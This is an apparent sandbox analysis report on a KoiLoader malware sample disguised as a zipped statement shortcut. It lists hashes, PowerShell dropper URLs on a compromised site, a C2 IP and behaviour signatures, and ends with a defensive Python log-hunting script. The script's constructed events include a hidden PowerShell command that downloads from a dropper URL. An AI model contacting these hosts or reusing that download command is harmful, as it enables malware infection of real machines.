General

  • Target

    01_11_2024_stmnt.pdf.zip

  • Size

    1KB

  • Sample

    241108-vbwj5avmax

  • MD5

    cb3314448a53fccca8e81f48ec172f2b

  • SHA1

    73aa6ad9fa94b2a82daffe6183870ae58612e448

  • SHA256

    f2a993d66e959f8358bcb7023095655856c9f9a172c20a1b92042077a05a7916

  • SHA512

    0677dbea73b51abafce9144e6d31052c778b29b395dccccc1f6f3ace7631948a9b8cc72901f16900ebf7813841af1abdbab0452f29d7d3545d87de93959f135f

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/stomachersjkl.php

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/destineziteQaJxo.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/nonmajoritieskvr.php

exe.dropper

https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04/uninwreathedslZC.ps1

Extracted

Family

koiloader

C2

http://82.118.19.30/stripper.php

Attributes
  • payload_url

    https://www.scuoladanzalibellula.it/wp-content/uploads/2020/04

Targets

    • Target

      01_11_2024_stmnt.lnk

    • Size

      3KB

    • MD5

      d9b3bfc5bb4ae12f08c3ccd71b73bec2

    • SHA1

      ab60d0f7cbcb1df3b46b2df0dda5734ec922fd12

    • SHA256

      12d59541e4ce7bdfe5c346151de3fec00f2d096d662b9762d50a36097d41829e

    • SHA512

      38bea311ece6d92dcbd8c4a4e30c504ea1181e26fe6d9106365a71b7d069b78fa6bc2e0daa56fce45613d2ba2e878799893b6f632d3e54c8f73d3fbaf776d6f0

    • KoiLoader

      KoiLoader is a malware loader written in C++.

    • Koiloader family

    • Detects KoiLoader payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      PowerShell Invoke-WebRequest.

    • Indicator Removal: Clear Persistence

      Clears artifacts associated with previously established persistence, such as scheduled tasks, on a host.
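
The two behavioural signatures above (PowerShell making a web request, and scheduled-task removal as indicator cleanup) are the ones worth hunting for on an endpoint that opened this .lnk. The script below is an added example, not part of the Triage report or of KoiLoader: it scores process-creation and network log lines against the hosts taken from the extracted config (the payload_url host and the C2) and against the two behaviours. The log lines are constructed to resemble Security 4688 and Sysmon Event 3 fields and were not captured from the sandbox run; the list of PowerShell download primitives is an analyst assumption, not something taken from the sample.

```python
"""Hunt for the two behaviours the report flags, PowerShell web requests to the
payload host and scheduled-task removal, in process-creation and network logs.

Added example: not part of the Triage report or of KoiLoader. The log lines
below are CONSTRUCTED to resemble Security 4688 and Sysmon Event 3 fields and
were not captured from the sandbox run; the download-primitive list is an
analyst assumption, not taken from the sample.
"""
import re
from urllib.parse import urlparse

# Hosts taken from the report's extracted config (payload_url and C2).
IOC_HOSTS = {"www.scuoladanzalibellula.it", "82.118.19.30"}

# PowerShell download primitives commonly abused by droppers (assumption).
DOWNLOAD_PRIMITIVES = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|"
    r"downloadstring|downloadfile|net\.webclient|start-bitstransfer",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
# schtasks /delete or Unregister-ScheduledTask: the "Clear Persistence" signature.
CLEAR_PERSISTENCE = re.compile(
    r"schtasks(\.exe)?\s.*?[/-]delete\b|unregister-scheduledtask", re.IGNORECASE
)


def ioc_hosts_in(line):
    """IOC hosts referenced in a line, via URL hostnames or bare host/IP tokens."""
    found = {urlparse(u).hostname for u in URL_RE.findall(line)} & IOC_HOSTS
    found |= {h for h in IOC_HOSTS if h in line.lower()}
    return found


def classify(line):
    """Return the list of finding tags for one log line (empty if benign)."""
    findings = []
    if "powershell" in line.lower() and DOWNLOAD_PRIMITIVES.search(line):
        findings.append("powershell_web_request")
    if ioc_hosts_in(line):
        findings.append("ioc_host_contact")
    if CLEAR_PERSISTENCE.search(line):
        findings.append("clear_persistence")
    return findings


def hunt(lines):
    """Return (line, findings) pairs for every line with at least one finding."""
    results = []
    for line in lines:
        findings = classify(line)
        if findings:
            results.append((line, findings))
    return results


# CONSTRUCTED sample events; task name, paths and the benign lines are made up.
SAMPLE_LOG = [
    # 4688-style: the .lnk spawns PowerShell, which pulls the ps1 dropper URL from the report.
    "4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -w hidden -c \"iwr https://www.scuoladanzalibellula.it"
    "/wp-content/uploads/2020/04/stomachersjkl.php -UseBasicParsing\"",
    # 4688-style: persistence cleanup via schtasks.
    "4688 NewProcessName=C:\\Windows\\System32\\schtasks.exe "
    "CommandLine=schtasks /delete /tn Updater /f",
    # Benign noise.
    "4688 NewProcessName=C:\\Windows\\System32\\notepad.exe CommandLine=notepad.exe report.txt",
    # Legitimate-looking PowerShell download from a non-IOC host: behaviour hit, no IOC hit.
    "4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell Invoke-WebRequest https://example.com/tool.zip",
    # Sysmon Event 3-style: a dropped binary beaconing to the C2 address from the report.
    "3 Image=C:\\Users\\user\\AppData\\Local\\Temp\\payload.exe "
    "DestinationIp=82.118.19.30 DestinationPort=80",
]

if __name__ == "__main__":
    for line, findings in hunt(SAMPLE_LOG):
        print(", ".join(findings), "<-", line[:90])
```

A line that hits both `powershell_web_request` and `ioc_host_contact` (the first constructed event) is the high-confidence match for this chain; `clear_persistence` on its own is noisy in fleets where management tooling rewrites tasks, so pair it with the other two findings on the same host within a short window before escalating.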

MITRE ATT&CK Enterprise v15

Tasks